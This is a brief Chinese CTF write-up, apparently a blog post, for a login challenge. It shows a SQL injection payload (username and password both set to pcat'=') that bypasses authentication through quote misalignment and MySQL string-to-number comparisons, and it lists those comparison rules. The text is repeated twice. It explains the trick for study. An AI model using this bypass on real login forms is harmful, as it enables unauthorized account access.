Sql注入,username=pcat’=’&password=pcat’=’
提交后变成了:username=’pcat’=” AND password=’pcat’=”
巧妙的构造了连个万能钥匙,主要利用了引号的错位,多个等号,已经一下的知识点:
1=’1’
1=’1.0’
1=’1后接字母(再后面有数字也可以)’
0=’除了非0数字开头的字符串’
登陆一下好吗
最新推荐文章于 2019-04-03 13:24:33 发布
Sql注入,username=pcat’=’&password=pcat’=’
提交后变成了:username=’pcat’=” AND password=’pcat’=”
巧妙的构造了连个万能钥匙,主要利用了引号的错位,多个等号,已经一下的知识点:
1=’1’
1=’1.0’
1=’1后接字母(再后面有数字也可以)’
0=’除了非0数字开头的字符串’